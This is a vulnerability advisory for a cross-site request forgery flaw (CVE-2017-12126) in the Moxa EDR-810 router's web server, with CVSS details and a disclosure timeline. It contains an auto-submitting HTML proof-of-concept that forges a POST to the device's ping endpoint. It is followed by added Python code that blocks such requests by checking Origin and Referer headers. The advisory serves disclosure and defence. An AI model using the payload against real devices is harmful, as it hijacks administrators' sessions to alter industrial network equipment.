Seebug SSV:97226
Published: Apr 16, 2018

Moxa EDR-810 Web Server Cross-Site Request Forgery Vulnerability (CVE-2017-12126)


EPSS: 0.004 (Percentile: 73.9%)

Summary

An exploitable cross-site request forgery vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP packet can cause cross-site request forgery. An attacker can create malicious HTML to trigger this vulnerability.

Tested Versions

Moxa EDR-810 V4.1 build 17030317

Product URLs

https://www.moxa.com/product/EDR-810.htm

CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-352 - Cross-Site Request Forgery (CSRF)

Details

In order to trigger the CSRF, a logged-in user needs to visit a page with malicious code on it. The malicious code will be able to do anything the logged-in user can do. For example, the malicious code could add a user, modify firewall rules, etc. This could also be chained with a command injection to get a root shell on the device. This problem is compounded by the fact that users cannot log out of the device, meaning that a user’s session will remain valid long after they’ve stopped interacting with the device.

Exploit Proof-of-Concept

<html>
  <body>
    <form action="http://192.168.127.254/goform/net_WebPingGetValue" method="POST">
      <input type="hidden" name="pingTmp" value="192.168.127.22" />
      <input type="hidden" name="ifs" value="1" />
      <input type="hidden" name="ip" value="192.168.127.22" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
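
A server-side mitigation for the forged POST shown in the proof-of-concept, as an added example that is not from the advisory or from Moxa's firmware: a reverse proxy or request handler rejects state-changing requests whose Origin or Referer is not the device's own origin. The function names, the trusted-origin list and the sample requests are assumptions constructed for illustration; only the device address is taken from the PoC.

```python
from urllib.parse import urlsplit

STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}
DEFAULT_PORTS = {"http": 80, "https": 443}

def origin_of(url):
    """Return (scheme, host, port) for a URL, or None if it has no usable origin."""
    try:
        parts = urlsplit(url)
        port = parts.port          # raises ValueError on a malformed port
    except ValueError:
        return None
    if parts.scheme not in DEFAULT_PORTS or not parts.hostname:
        return None                # covers "null", empty and non-HTTP values
    if port is None:
        port = DEFAULT_PORTS[parts.scheme]
    return (parts.scheme, parts.hostname.lower(), port)

def allow_request(method, headers, trusted_origins):
    """True if the request may reach the device; header names are lower-cased."""
    if method.upper() not in STATE_CHANGING:
        return True
    trusted = {origin_of(o) for o in trusted_origins} - {None}
    # Prefer Origin, fall back to Referer; fail closed when both are absent.
    source = origin_of(headers.get("origin") or headers.get("referer") or "")
    return source is not None and source in trusted

TRUSTED = ["http://192.168.127.254"]   # device address as used in the PoC

# Constructed sample requests (method, headers); not captured traffic.
SAMPLES = [
    ("POST", {"origin": "http://192.168.127.254"}),              # same-origin UI
    ("POST", {"origin": "http://other-site.example"}),           # cross-site form
    ("POST", {"origin": "null"}),                                # opaque origin
    ("POST", {"referer": "http://192.168.127.254.other-site.example/p.html"}),
    ("POST", {}),                                                # no source header
    ("GET", {"referer": "http://other-site.example/"}),          # not state-changing
]

def evaluate():
    return [allow_request(m, h, TRUSTED) for m, h in SAMPLES]

if __name__ == "__main__":
    for (method, headers), ok in zip(SAMPLES, evaluate()):
        print("ALLOW" if ok else "BLOCK", method, headers)
```

An Origin/Referer check is defense in depth; a per-session anti-CSRF token validated on every state-changing request remains the primary fix for CWE-352.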

Timeline

  • 2017-11-15 - Vendor Disclosure
  • 2017-11-19 - Vendor Acknowledged
  • 2017-12-25 - Vendor provided timeline for fix (Feb 2018)
  • 2018-01-04 - Timeline pushed to mid-March per vendor
  • 2018-03-24 - Talos follow up with vendor for release timeline
  • 2018-03-26 - Timeline pushed to 4/13/18 per vendor
  • 2018-04-12 - Vendor patched & published new firmware on website
  • 2018-04-13 - Public Release
